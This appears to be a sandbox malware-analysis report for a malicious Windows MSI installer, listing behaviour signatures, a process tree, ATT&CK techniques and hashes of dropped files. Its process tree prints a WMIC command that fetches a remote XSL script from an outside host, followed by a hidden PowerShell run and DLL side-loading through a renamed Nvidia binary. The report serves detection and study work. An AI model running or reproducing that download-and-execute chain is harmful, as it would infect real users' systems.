Overview

overview

10

Static

static

8

test/0b627...5b.doc

windows10_x64

10

test/0dded...66.doc

windows10_x64

10

test/91B5D...9D.msi

windows10_x64

8

test/ed01e...aa.exe

windows10_x64

10

test/fe9d7...8f.exe

windows10_x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13-10-2021 09:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test/91B5DB3C0CCBD68BD04C24571E27F99D.msi

  • Size

    277KB

  • MD5

    91b5db3c0ccbd68bd04c24571e27f99d

  • SHA1

    b01cb4fe38315d41fcbe9c6278ebe4574496ab0d

  • SHA256

    ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130

  • SHA512

    9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1776
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1604
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding DFDAF55F4EC0517E0D5AFAC42616DCF5
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          4⤵
          • Blocklisted process makes network request
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1544
          • C:\Users\Admin\AppData\Roaming\JGhxpZnID\nvsmartmaxapp.exe
            "C:\Users\Admin\AppData\Roaming\JGhxpZnID\nvsmartmaxapp.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1560
            • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
              "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:3860
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 700
                7⤵
                • Program crash
                • Suspicious behavior: EnumeratesProcesses
                PID:552
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 128FB716D6AC8ED1CFD0FE27055600DF
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3708
      • C:\Users\Admin\AppData\Local\Temp\lcCB11.tmp
        "C:\Users\Admin\AppData\Local\Temp\lcCB11.tmp"
        3⤵
        • Executes dropped EXE
        PID:364

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Admin.ps1
    MD5

    9a362dd5fb8679b63ca3996098a903ff

    SHA1

    f86f4bdc36538c666ed60c7ad2091b9e07b6c7e3

    SHA256

    30cc11279f166a46236eb838391df9d0d93fda8e818755a6fbe6168d13c7e8fc

    SHA512

    d805eb926fd611cf81834d2f6fb27f025954365b636bc536c83247611106110dc404cbf96ce79ec96d76db443bcc24681903b786813e6ae407c1df7a59b71452

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\lcCB11.tmp
    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\lcCB11.tmp
    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

    Download Submit
  • C:\Users\Admin\AppData\Roaming\JGhxpZnID\NvSmartMax
    MD5

    78ef53b2ad57536c74bbafece93a95e6

    SHA1

    4b23eb993a5853013911a0310c1cbb834500ba94

    SHA256

    371a793bdbe086871f1526000f878499b5fdd0426ffb6934745866483bbb6751

    SHA512

    182079daa43cf65d29d277274cdb78b3383a61a518237c65bf4dcc29ba71e147c425f097d4473fecd455f4f9ab44c316bf1e292d045529b167bb852cb1babe71

    Download Submit
  • C:\Users\Admin\AppData\Roaming\JGhxpZnID\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit
  • C:\Users\Admin\AppData\Roaming\JGhxpZnID\nvsmartmaxapp.exe
    MD5

    df3e0e32d1e1fb50cc292aebc5e5b322

    SHA1

    12c93bb262696314123562f8a4b158074c9f6b95

    SHA256

    6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

    SHA512

    71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\JGhxpZnID\nvsmartmaxapp.exe
    MD5

    df3e0e32d1e1fb50cc292aebc5e5b322

    SHA1

    12c93bb262696314123562f8a4b158074c9f6b95

    SHA256

    6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

    SHA512

    71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

    Download Submit
  • C:\Windows\Installer\MSIC4F7.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • C:\Windows\Installer\MSIC99B.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • C:\Windows\Installer\MSICAD5.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • C:\Windows\Installer\MSICDD3.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • \Users\Admin\AppData\Roaming\JGhxpZnID\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit
  • \Users\Admin\AppData\Roaming\JGhxpZnID\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit
  • \Users\Admin\AppData\Roaming\JGhxpZnID\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit
  • \Windows\Installer\MSIC4F7.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • \Windows\Installer\MSIC99B.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • \Windows\Installer\MSICAD5.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • \Windows\Installer\MSICDD3.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit
  • memory/364-132-0x0000000000000000-mapping.dmp
    Download
  • memory/1160-121-0x0000014D3F830000-0x0000014D3F832000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1160-120-0x0000014D3F830000-0x0000014D3F832000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1160-119-0x0000000000000000-mapping.dmp
    Download
  • memory/1544-142-0x00000157D1930000-0x00000157D1931000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1544-190-0x00000157D1789000-0x00000157D178F000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1544-139-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-140-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-141-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-143-0x00000157D1780000-0x00000157D1782000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-200-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-144-0x00000157D1783000-0x00000157D1785000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-145-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-146-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-147-0x00000157D1AE0000-0x00000157D1AE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1544-137-0x0000000000000000-mapping.dmp
    Download
  • memory/1544-149-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-165-0x00000157D1786000-0x00000157D1788000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-166-0x00000157D1788000-0x00000157D1789000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1544-167-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-168-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-138-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-191-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1544-192-0x00000157B91D0000-0x00000157B91D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1560-209-0x0000000001120000-0x000000000126A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/1560-196-0x0000000000000000-mapping.dmp
    Download
  • memory/1604-118-0x0000018C87730000-0x0000018C87732000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1604-117-0x0000018C87730000-0x0000018C87732000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1776-116-0x000001E6D21C0000-0x000001E6D21C2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1776-115-0x000001E6D21C0000-0x000001E6D21C2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3708-124-0x0000000000420000-0x0000000000421000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3708-125-0x0000000000420000-0x0000000000421000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3708-123-0x0000000000000000-mapping.dmp
    Download
  • memory/3860-202-0x0000000000000000-mapping.dmp
    Download
  • memory/3860-205-0x00000000044A0000-0x000000000481D000-memory.dmp
    Filesize

    3.5MB

    Download
  • memory/3860-207-0x00000000004D0000-0x000000000061A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/3860-208-0x0000000004AC0000-0x0000000004AC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3944-122-0x0000000000000000-mapping.dmp
    Download